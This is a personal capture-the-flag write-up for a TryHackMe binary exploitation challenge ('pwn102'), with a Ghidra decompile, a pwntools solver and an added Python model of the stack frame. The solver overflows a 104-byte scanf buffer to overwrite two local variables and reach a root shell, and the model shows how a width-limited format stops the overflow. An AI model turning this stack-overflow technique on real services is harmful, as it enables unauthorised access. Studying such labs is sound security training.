02 Specific Modifying Stack

#pwn #thm

Given binary:
pwn102.pwn102

Put in Ghidra:

void main(void)

{
  undefined local_78 [104];
  int local_10;
  int local_c;
  
  setup();
  banner();
  local_c = 0xbadf00d;
  local_10 = -0x11e2153;
  printf("I need %x to %x\nAm I right? ",0xbadf00d,0xfee1dead);
  __isoc99_scanf(&DAT_00100b66,local_78);
  if ((local_c == 0xc0ff33) && (local_10 == 0xc0d3)) {
    printf("Yes, I need %x to %x\n",0xc0ff33,0xc0d3);
    system("/bin/sh");
    return;
  }
  puts("I\'m feeling dead, coz you said I need bad food :(");
                    /* WARNING: Subroutine does not return */
  exit(0x539);
}

We need to modify the stack variables local_c and local_10 by overflowing the 104-byte buffer local_78 that scanf reads into.

Here is my solver:

import pwn
from pwn import p32   # p32 lives in pwnlib.util.packing, re-exported by pwn

p = pwn.remote('10.10.22.66', 9002)
pwn.context.log_level = 'debug'
p.recv()

# local_c  / rbp-0x4 expected value : 0xc0ff33
# local_10 / rbp-0x8 expected value : 0xc0d3

# Why must 0xc0d3 (rbp-0x8) go first? The overflow writes upward from the end of the
# 104-byte buffer, so local_10 at rbp-0x8 is reached before local_c at rbp-0x4.
p.sendlineafter(' ', b'A' * 104 + p32(0xc0d3) + p32(0xc0ff33))
p.interactive()
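Why the two p32 values go in that order, as an added example that is not part of the original note: a byte-level model of main()'s frame (offsets taken from the decompile above, scanf modelled as a plain copy up to the first whitespace byte) applies the solver's payload and reads back local_10 and local_c; the bounded variant shows that a width-limited format such as "%103s" would leave both untouched.

```python
import struct

# Frame model of pwn102's main(), offsets taken from this page's decompile and
# its rbp-relative comments: local_78 at rbp-0x70 (104 bytes), local_10 at
# rbp-0x8, local_c at rbp-0x4, then the 8-byte saved rbp. Offset 0 == rbp-0x70.
FRAME_SIZE = 0x70 + 8            # locals plus saved rbp
BUF_OFF, BUF_LEN = 0x70 - 0x70, 104
LOCAL_10_OFF = 0x70 - 0x8        # 104: the first byte past the buffer
LOCAL_C_OFF = 0x70 - 0x4         # 108
SAVED_RBP_OFF = 0x70             # 112

def new_frame():
    """Frame as main() leaves it before scanf: initial values from the decompile."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into('<I', frame, LOCAL_10_OFF, 0xfee1dead)   # -0x11e2153 as u32
    struct.pack_into('<I', frame, LOCAL_C_OFF, 0xbadf00d)
    return frame

def scanf_s(frame, data, width=None):
    """Model scanf("%s") (width=None, unbounded) or "%<width>s" into local_78.
    Copies up to the first whitespace byte, then appends a NUL."""
    stop = next((i for i, b in enumerate(data) if b in b' \t\n\r\f\v'), len(data))
    n = stop if width is None else min(stop, width)
    frame[BUF_OFF:BUF_OFF + n] = data[:n]
    frame[BUF_OFF + n] = 0       # unbounded: this NUL lands on the saved rbp's low byte
    return n

def read_locals(frame):
    """(local_10, local_c) as the `if` in main() sees them."""
    return (struct.unpack_from('<I', frame, LOCAL_10_OFF)[0],
            struct.unpack_from('<I', frame, LOCAL_C_OFF)[0])

def build_payload():
    """Same bytes the solver sends: padding, then rbp-0x8, then rbp-0x4."""
    return b'A' * BUF_LEN + struct.pack('<I', 0xc0d3) + struct.pack('<I', 0xc0ff33)

def overflow_result():
    frame = new_frame()
    scanf_s(frame, build_payload())          # unbounded %s: 112 bytes written
    return read_locals(frame)                # -> (0xc0d3, 0xc0ff33)

def bounded_result():
    frame = new_frame()
    scanf_s(frame, build_payload(), width=BUF_LEN - 1)   # "%103s": room for the NUL
    return read_locals(frame)                             # -> (0xfee1dead, 0xbadf00d)
```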

How can we check the rbp offsets? Using gdb with pwndbg.
Here it is:
Pasted image 20240301165545.png


Run the script and get the flag.

Pasted image 20240301165631.png